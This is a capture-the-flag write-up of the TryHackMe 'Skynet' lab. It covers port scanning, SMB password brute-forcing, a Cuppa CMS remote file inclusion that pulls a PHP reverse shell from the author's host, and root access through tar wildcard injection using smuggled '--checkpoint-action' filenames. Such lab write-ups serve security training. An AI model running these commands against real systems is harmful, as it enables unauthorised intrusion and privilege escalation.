#tryhackme #linux #easy ![[Pasted image 20250624224650.png]] --- # Port Scanning - Nmap As always I began with scanning all TCP ports with Nmap. ```bash root@ip-10-10-49-42:~# sudo nmap -sS 10.10.180.210 -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-25 01:28 BST Nmap scan report for 10.10.180.210 Host is up (0.00054s latency). Not shown: 65529 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 110/tcp open pop3 139/tcp open netbios-ssn 143/tcp open imap 445/tcp open microsoft-ds MAC Address: 02:C4:8A:43:D0:67 (Unknown) Nmap done: 1 IP address (1 host up) scanned in 2.37 seconds ``` When the initial scan is finished, I usually run another scan right after but this time port-scanning only against the ports found. ```bash root@ip-10-10-49-42:~# nmap -sC -sV $IP -p 22,80,110,139,143,445 Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-25 01:30 BST Nmap scan report for ip-10-10-180-210.eu-west-1.compute.internal (10.10.180.210) Host is up (0.00023s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA) | 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA) |_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Skynet 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: CAPA SASL TOP RESP-CODES AUTH-RESP-CODE PIPELINING UIDL 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_imap-capabilities: ID more have post-login OK LOGINDISABLEDA0001 capabilities ENABLE listed SASL-IR IMAP4rev1 LOGIN-REFERRALS Pre-login LITERAL+ IDLE 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) MAC Address: 02:C4:8A:43:D0:67 (Unknown) Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -1s |_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: skynet | NetBIOS computer name: SKYNET\x00 | Domain name: \x00 | FQDN: skynet |_ System time: 2025-06-24T19:31:10-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2025-06-25T00:31:10 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.48 seconds ``` Finally scanning top 1,000 UDP ports. ```bash root@ip-10-10-49-42:~# nmap -sU $IP --min-rate 3000 --top-ports 1000 Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-25 01:32 BST Nmap scan report for ip-10-10-180-210.eu-west-1.compute.internal (10.10.180.210) Host is up (0.00027s latency). Not shown: 993 open|filtered ports PORT STATE SERVICE 137/udp open netbios-ns 686/udp closed hcp-wismar 959/udp closed unknown 27899/udp closed unknown 36384/udp closed unknown 42313/udp closed unknown 49178/udp closed unknown MAC Address: 02:C4:8A:43:D0:67 (Unknown) Nmap done: 1 IP address (1 host up) scanned in 0.96 seconds ``` # Footprinting ##### Port 80 ![[Pasted image 20250624193618.png]] ```bash root@ip-10-10-49-42:~# gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.180.210 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /admin (Status: 301) [Size: 314] [--> http://10.10.180.210/admin/] /css (Status: 301) [Size: 312] [--> http://10.10.180.210/css/] /js (Status: 301) [Size: 311] [--> http://10.10.180.210/js/] /config (Status: 301) [Size: 315] [--> http://10.10.180.210/config/] /ai (Status: 301) [Size: 311] [--> http://10.10.180.210/ai/] /squirrelmail (Status: 301) [Size: 321] [--> http://10.10.180.210/squirrelmail/] /server-status (Status: 403) [Size: 278] Progress: 218275 / 218276 (100.00%) =============================================================== Finished =============================================================== ``` ![[Pasted image 20250624203459.png]] ##### Port 445 I was able to list shares with `smbclient`. anonymous and milesdyson shares stood out to me. ```bash root@ip-10-10-49-42:~# smbclient -N -L //$IP Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers anonymous Disk Skynet Anonymous Share milesdyson Disk Miles Dyson Personal Share IPC$ IPC IPC Service (skynet server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available ``` `anonymous` share contained some files and I downloaded them locally to investigate further. ```bash root@ip-10-10-49-42:~# smbclient -N //$IP/anonymous Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Nov 26 16:04:00 2020 .. D 0 Tue Sep 17 08:20:17 2019 attention.txt N 163 Wed Sep 18 04:04:59 2019 logs D 0 Wed Sep 18 05:42:16 2019 9204224 blocks of size 1024. 5831508 blocks available smb: \> cd logs smb: \logs\> ls . D 0 Wed Sep 18 05:42:16 2019 .. D 0 Thu Nov 26 16:04:00 2020 log2.txt N 0 Wed Sep 18 05:42:13 2019 log1.txt N 471 Wed Sep 18 05:41:59 2019 log3.txt N 0 Wed Sep 18 05:42:16 2019 9204224 blocks of size 1024. 5831508 blocks available ``` `attention.txt` ```bash root@ip-10-10-49-42:~# cat attention.txt A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this. -Miles Dyson ``` `log1.txt` ```bash root@ip-10-10-49-42:~# cat log1.txt cyborg007haloterminator terminator22596 terminator219 terminator20 terminator1989 terminator1988 terminator168 terminator16 terminator143 terminator13 terminator123!@# terminator1056 terminator101 terminator10 terminator02 terminator00 roboterminator pongterminator manasturcaluterminator exterminator95 exterminator200 dterminator djxterminator dexterminator determinator cyborg007haloterminator avsterminator alonsoterminator Walterminator 79terminator6 1996terminator ``` `log2.txt` and `log3.txt` are just empty files ```bash root@ip-10-10-49-42:~# cat log2.txt root@ip-10-10-49-42:~# cat log3.txt root@ip-10-10-49-42:~# ls -l log2.txt -rw-r--r-- 1 root root 0 Jun 25 01:38 log2.txt root@ip-10-10-49-42:~# ls -l log3.txt -rw-r--r-- 1 root root 0 Jun 25 01:38 log3.txt ``` ```bash crackmapexec smb $IP -U milesdyson -P log1.txt ``` The `log1.txt` contains what appears to be a list of passwords. This suggests that I should perform a brute-force attack against the SMB server to discover valid credentials. Then I did. ```bash root@ip-10-10-49-42:~# crackmapexec smb $IP -u 'skynet.local\miles' -p log1.txt SMB 10.10.180.210 445 SKYNET [*] Windows 6.1 (name:SKYNET) (domain:) (signing:False) (SMBv1:True) SMB 10.10.180.210 445 SKYNET [+] skynet.local\miles:cyborg007haloterminator ``` I found a set of valid credentials but I still wasn't able to access the `/milesdyson` SMB share. I suddenly remembered the `/squirrelmail` path I had discovered earlier using gobuster. What If I try the credentials there? `miles:cyborg007haloterminator` didn't work. I tried his full name as the username and it let me in! ![[Pasted image 20250624203903.png]] ![[Pasted image 20250624203915.png]] Let's read each email one by one starting with the first one. This is why the password found did not work. ![[Pasted image 20250624204100.png]] The second email contains nothing but binary data. I'll make sure to convert it to text later. ![[Pasted image 20250624204207.png]] And the last email in inbox. ![[Pasted image 20250624204457.png]] I have converted the binary data found in the second email and the converted data appears to be very similar to contents found in the last email. ![[Pasted image 20250624204740.png]] )s{A&2Z=F^n_E.B` ```bash root@ip-10-10-49-42:~# smbclient //$IP/milesdyson -U milesdyson Password for [WORKGROUP\milesdyson]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Tue Sep 17 10:05:47 2019 .. D 0 Wed Sep 18 04:51:03 2019 Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 10:05:14 2019 Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 10:05:14 2019 Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 10:05:14 2019 notes D 0 Tue Sep 17 10:18:40 2019 Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 10:05:14 2019 Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 10:05:14 2019 9204224 blocks of size 1024. 5810756 blocks available smb: \> ``` I downloaded every single file there is in `milesdyson` share including the `notes` directory ```bash smb: \> prompt OFF smb: \> recurse ON smb: \> mget notes getting file \notes\3.01 Search.md of size 65601 as notes/3.01 Search.md (32030.2 KiloBytes/sec) (average 73885.3 KiloBytes/sec) getting file \notes\4.01 Agent-Based Models.md of size 5683 as notes/4.01 Agent-Based Models.md (1849.9 KiloBytes/sec) (average 73533.4 KiloBytes/sec) getting file \notes\2.08 In Practice.md of size 7949 as notes/2.08 In Practice.md (2587.5 KiloBytes/sec) (average 73188.4 KiloBytes/sec) getting file \notes\0.00 Cover.md of size 3114 as notes/0.00 Cover.md (1520.4 KiloBytes/sec) (average 72956.8 KiloBytes/sec) getting file \notes\1.02 Linear Algebra.md of size 70314 as notes/1.02 Linear Algebra.md (34331.3 KiloBytes/sec) (average 72832.4 KiloBytes/sec) ``` Then this file named `important.txt` caught my eyes. ```bash root@ip-10-10-49-42:~/notes# cat important.txt 1. Add features to beta CMS /45kra24zxs28v3yd 2. Work on T-800 Model 101 blueprints 3. Spend more time with my wife ``` I navigated to `10.10.180.210/45kra24zxs28v3yd` and found this page below. ![[Pasted image 20250624210146.png]] Ran a gobuster against that path and enumerated `/administrator`. ```bash root@ip-10-10-49-42:~/notes# gobuster dir -u http://$IP/45kra24zxs28v3yd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.180.210/45kra24zxs28v3yd [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /administrator (Status: 301) [Size: 339] [--> http://10.10.180.210/45kra24zxs28v3yd/administrator/] Progress: 218275 / 218276 (100.00%) =============================================================== Finished =============================================================== root@ip-10-10-49-42:~/notes# ``` `/administrator` revealed the name of the CMS being used: `Cuppa`. ![[Pasted image 20250624211610.png]] # Exploit I searched `cuppa` in searchsploit and there was one known vulnerability to Cuppa CMS. ```bash root@ip-10-10-50-98:~# searchsploit cuppa ---------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------- --------------------------------- Cuppa CMS - '/alertConfigField.php' Local/Rem | php/webapps/25971.txt ---------------------------------------------- --------------------------------- Shellcodes: No Results ``` The exploit `25971.txt` describes that we can perform a RFI attack which can lead to full server compromise. ```bash ##################################################### DESCRIPTION ##################################################### An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise. http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI] ##################################################### EXPLOIT ##################################################### http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt? http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd Moreover, We could access Configuration.php source code via PHPStream ``` Preparing the attack, I downloaded the famous `Pentest Monkey`'s php reverse shell which I'm going to use to receive the shell. ![[Pasted image 20250624215533.png]] I'm going to host an HTTP server using Python. This server will host my reverse shell payload. The goal is to link my reverse shell payload to the path specified in the PoC description. This way, as soon as the reverse shell connects, I should receive a shell on my listener. ```bash root@ip-10-10-50-98:~# python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... ``` ```bash root@ip-10-10-50-98:~# nc -lvnp 1234 Listening on 0.0.0.0 1234 ``` This is the full path that I make a request to. ```bash http://10.10.237.190/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.50.98:8000/php-reverse-shell.php ``` Upon navigating to that URL in the browser, I immediately saw that my reverse shell being downloaded. ```bash root@ip-10-10-50-98:~# python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.237.190 - - [25/Jun/2025 04:02:28] "GET /php-reverse-shell.php HTTP/1.0" 200 - ``` Checking Netcat listener, I saw that I had a reverse shell as expected. ```bash root@ip-10-10-50-98:~# nc -lvnp 1234 Listening on 0.0.0.0 1234 Connection received on 10.10.237.190 47674 Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 22:02:27 up 37 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-data ``` Found `user.txt`! ```bash $ cd milesdyson $ ls backups mail share user.txt $ cat user.txt 7ce5... ``` # Privilege Escalation `cat /etc/crontab` reveals that `backup.sh` file is scheduled to run every minute. ```bash www-data@skynet:/home/milesdyson$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command */1 * * * * root /home/milesdyson/backups/backup.sh 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # ``` Unfortunately we cannot modify the file since we do not have `write` permissions. ```bash www-data@skynet:/home/milesdyson$ ls -l /home/milesdyson/backups/backup.sh -rwxr-xr-x 1 root root 74 Sep 17 2019 /home/milesdyson/backups/backup.sh ``` What backup.sh file does is it creates an backup archive of the web every minute. It first changes directory to `/var/www/html` and uses tar to compress the content of that directory into an archive. ```bash www-data@skynet:/home/milesdyson/backups$ cat backup.sh #!/bin/bash cd /var/www/html tar cf /home/milesdyson/backups/backup.tgz * ``` I was stuck here and I was not able to finish the PrivEsc on my own. So what comes after is what I've gathered from other people's write ups. Apparently, there's a technique called **Wildcard Injection**, which takes advantage of the wildcard in the tar command. In order to exploit this vulnerability, we are going to proceed as follows: 1. Create a script to set the SUID bit to `/bin/bash` ```bash echo -e '#!/bin/bash\nchmod +s /bin/bash' > /var/www/html/root_shell.sh ``` 2. Create these two files: 1. `--checkpoint-action=exec=sh root_shell.sh` 2. `--checkpoint=1` ```bash touch "/var/www/html/--checkpoint-action=exec=sh root_shell.sh" touch "/var/www/html/--checkpoint=1" ``` `--checkpoint-action=ACTION` and `--checkpoint=NUMBER` are two options available with `tar` command. - `--checkpoint=NUMBER` displays progress messages every `Number`th record. - `--checkpoint-action=ACTION` executes ACTION on each checkpoint. In our case `exec`. - `exec=command` executes the specified command (`sh root_shell.sh) Therefore, when the cronjob will execute the next time, it will take the two files we created above as options rather than normal filenames and set `/bin/bash` with SUID permissions. Got the `root.txt` flag ```bash www-data@skynet:/home/milesdyson/backups$ ls -l /bin/bash -rwsr-sr-x 1 root root 1037528 Jul 12 2019 /bin/bash www-data@skynet:/home/milesdyson/backups$ /bin/bash -p bash-4.3# whoami root bash-4.3# cd /root bash-4.3# ls root.txt bash-4.3# cat root.txt 3f0372db24753accc7179a282cd6a949 ```